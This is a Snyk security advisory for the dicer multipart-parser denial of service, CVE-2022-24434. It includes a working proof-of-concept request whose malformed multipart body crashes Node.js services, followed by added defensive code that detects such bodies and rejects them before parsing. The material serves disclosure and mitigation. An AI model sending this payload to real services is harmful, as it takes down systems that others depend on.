CVE-2022-24434: Denial of Service (DoS) in dicer | CVE-2022-24434 | Snyk

This affects all versions of the dicer package. An attacker can send a modified multipart form to the server and crash the Node.js service; sending the same payload repeatedly keeps the service crashing continuously.

Tags: #web #dos #nodejs #js #webkit


  • snyk-id: SNYK-JS-DICER-2311764
  • published: 19 May 2022
  • disclosed: 7 Dec 2021
  • credit: Aras Abbasi

How to fix?

There is no fixed version for dicer.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can send a modified multipart form to the server and crash the Node.js service; sending the same payload repeatedly keeps the service crashing continuously.

PoC:

    fetch('form-image', {
      method: 'POST',
      headers: {
        ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
        ['content-length']: '145',
        host: '127.0.0.1:8000',
        connection: 'keep-alive',
      },
      body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'
    });
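Since no fixed dicer release exists, the practical mitigation is to keep a malformed body from reaching the parser at all and to answer it with a 400 instead of letting an exception take the process down. The following is an added example, not code from the advisory or from the dicer project. It does not claim to reproduce dicer's internal failure (the advisory does not state the root cause); it validates the header block of every multipart part for the shape visible in the PoC body above (a line beginning with whitespace before any header exists, which a parser would read as a continuation of a header that was never sent) and for lines that are not `name: value`. The function names `boundaryFromContentType`, `checkMultipartHeaders` and `triageUpload` are hypothetical, and the sample bodies are constructed inline (the PoC body and boundary are the values quoted above, the well-formed body is made up for comparison).

```javascript
'use strict';

// Constructed sample inputs (not a live capture). POC_BODY/POC_BOUNDARY are the
// values quoted in the advisory's PoC; GOOD_BODY is a well-formed body for
// comparison.
const POC_BOUNDARY = '----WebKitFormBoundaryoo6vortfDzBsDiro';
const POC_BODY =
  '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n' +
  ' Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n' +
  '------WebKitFormBoundaryoo6vortfDzBsDiro--';

const GOOD_BOUNDARY = '----ExampleBoundary';
const GOOD_BODY =
  '------ExampleBoundary\r\n' +
  'Content-Disposition: form-data; name="bildbeschreibung"\r\n' +
  'Content-Type: text/plain\r\n\r\n' +
  'a caption\r\n' +
  '------ExampleBoundary--\r\n';

// RFC 7230 token characters, used to validate header field names.
const HEADER_LINE = /^[!#$%&'*+.^_`|~0-9A-Za-z-]+:/;

// Extract the boundary parameter from a Content-Type value, or null.
function boundaryFromContentType(contentType) {
  const m = /boundary=(?:"([^"]*)"|([^;\s]+))/i.exec(contentType || '');
  if (!m) return null;
  return m[1] !== undefined ? m[1] : m[2];
}

// Walk every part of a multipart body and check its header block for shapes
// a strict parser may not handle: a folded continuation line (leading SP/HT)
// with no header to continue, or a line that is not "name: value".
// Returns { ok, problems }.
function checkMultipartHeaders(body, boundary) {
  const delimiter = '--' + boundary;
  const problems = [];
  // RFC 2046 forbids the delimiter inside part data, so a plain split is
  // enough to isolate the parts; chunk 0 is the preamble.
  const chunks = body.split(delimiter);
  for (let i = 1; i < chunks.length; i++) {
    let chunk = chunks[i];
    if (chunk.startsWith('--')) break; // closing delimiter reached
    if (!chunk.startsWith('\r\n')) {
      problems.push(`part ${i}: delimiter line not terminated by CRLF`);
      continue;
    }
    chunk = chunk.slice(2);
    let lines = [];
    if (!chunk.startsWith('\r\n')) { // non-empty header block
      const end = chunk.indexOf('\r\n\r\n');
      if (end === -1) {
        problems.push(`part ${i}: header block never terminated`);
        continue;
      }
      lines = chunk.slice(0, end).split('\r\n');
    }
    let seenHeader = false;
    for (const line of lines) {
      if (/^[ \t]/.test(line)) {
        if (!seenHeader) {
          problems.push(`part ${i}: continuation line with no preceding header: ${JSON.stringify(line)}`);
        }
        continue;
      }
      if (!HEADER_LINE.test(line)) {
        problems.push(`part ${i}: malformed header line: ${JSON.stringify(line)}`);
        continue;
      }
      seenHeader = true;
    }
  }
  return { ok: problems.length === 0, problems };
}

// What a request handler should decide before any multipart parser runs:
// answer malformed bodies with 400 rather than letting a parser exception
// take the whole Node.js process down.
function triageUpload(contentType, body) {
  const boundary = boundaryFromContentType(contentType);
  if (!boundary) return { status: 400, reason: 'missing multipart boundary' };
  const check = checkMultipartHeaders(body, boundary);
  if (!check.ok) return { status: 400, reason: check.problems.join('; ') };
  return { status: 200, reason: 'header blocks well-formed' };
}

console.log(triageUpload(`multipart/form-data; boundary=${POC_BOUNDARY}`, POC_BODY));
console.log(triageUpload(`multipart/form-data; boundary=${GOOD_BOUNDARY}`, GOOD_BODY));
```

In a real service this pre-check would run on the buffered request body (with a size cap) before `req.pipe(...)` hands it to the multipart parser, and the `400` path should also be logged, since a burst of rejected bodies with the same malformed shape is the detection signal for someone repeatedly sending this payload. It is a filter in front of the parser, not a replacement for moving to a maintained multipart library.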
